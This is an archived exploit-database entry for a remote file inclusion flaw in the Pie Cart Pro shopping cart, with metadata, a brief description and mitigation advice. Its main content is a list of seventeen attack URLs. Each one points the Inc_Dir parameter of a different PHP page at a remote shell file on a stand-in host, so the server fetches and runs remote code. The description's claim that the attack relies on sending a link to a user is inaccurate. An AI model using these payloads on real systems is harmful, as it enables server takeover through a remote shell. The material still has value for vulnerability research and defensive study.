Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit

vendor:

Pie Cart Pro

by:

SnIpEr_SA

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: Pie Cart Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit

Pie Cart Pro is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. The vulnerable parameter is Inc_Dir, which can be found in multiple files such as affiliates.php, orders.php, events.php, index.php, articles.php, faqs.php, guestbook.php, catalog.php, wholesale.php, weblinks.php, certificates.php, sitesearch.php, contact.php, sitemap.php, search.php, registry.php, and error.php. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an unsuspecting user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion context.

Source

Exploit-DB raw data:

#====================================================================
# Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By SnIpEr_SA
#
#http://www.doodlebabies.com/
#
#=================================================================
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/affiliates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/orders.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/events.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/index.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/articles.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/faqs.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/guestbook.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/catalog.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/wholesale.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/weblinks.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/certificates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitesearch.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/contact.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitemap.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/search.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/registry.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/error.php?Inc_Dir=http://shell.com/shell.txt?
#
#==============================================================================
#Discoverd By : SnIpEr_SA
#
#Conatact : SnIpEr.SA[at]hotmail.com
#
#GreetZ : SaUdi HaCkRz , Devil-x , shereba, BlacK-Code, KILLERxXx ,Qptan,red devil , mazagi,Mohajer And All My Frind
#http://www.elite-team.cc/vb , www.3asfh.net ,www.lezr.com
============================================================================#

# milw0rm.com [2006-09-19]